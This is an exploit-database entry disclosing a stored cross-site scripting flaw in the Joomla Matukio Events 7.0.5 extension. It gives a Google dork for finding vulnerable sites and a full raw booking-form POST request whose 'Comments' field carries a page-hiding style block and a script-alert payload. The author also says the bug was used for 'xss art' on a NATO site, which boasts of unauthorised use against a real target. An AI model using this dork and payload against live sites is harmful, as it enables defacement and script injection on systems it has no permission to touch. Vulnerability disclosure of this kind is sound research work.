Joomla Matukio Events 7.0.5 Cross Site Scripting

Risk: Low
Local: No
Remote: Yes

# Exploit Title:Joomla Matukio Events 7.0.5 Stored XSS # Date:08.03.2021 # Author: Vincent666 ibn Winnie # Software Link: # Tested on: Windows 10 # Web Browser: Mozilla Firefox # My Youtube Channel : # Google Dorks: inurl:option=com_matukio PoC: I found simple , but interesting stored xss in Matukio Events. Press "Book Now": Field "Comments" vulnerable to XSS and html code injection. Put xss code and save this. It's works with different codes. The code I like for the test: Video: Example on another site Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------9492328303638924271813324098 Content-Length: 2816 Origin: Connection: keep-alive Referer: Cookie: d9122e5739e92113272e5173db43cd67=72qdv1oufsi2avknr7614genno; _ga=GA1.2.90714308.1615201744; _gid=GA1.2.178258541.1615201744 Upgrade-Insecure-Requests: 1 nrbooked=1&coupon_code=&field[3]=Mr&field[4]=&field[5]=azsxc&field[6]=ASD&field[8]=azsxc&field[9]=112233&field[10]=Zasx&field[11]=algeria&field[13][14]=&field[15]=&field[16]=&field[17]=<style>body{visibility:hidden;}html{background: url( round;}</style><script>alert("Test XSS")</script>&agb=Yes&revoke=Yes&uuid=& (p.s.: I don't publicly test the Joomla extensions anymore, but this time I posted it publicly because I did xss art on the NATO site in this component.)

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021,


Back to Top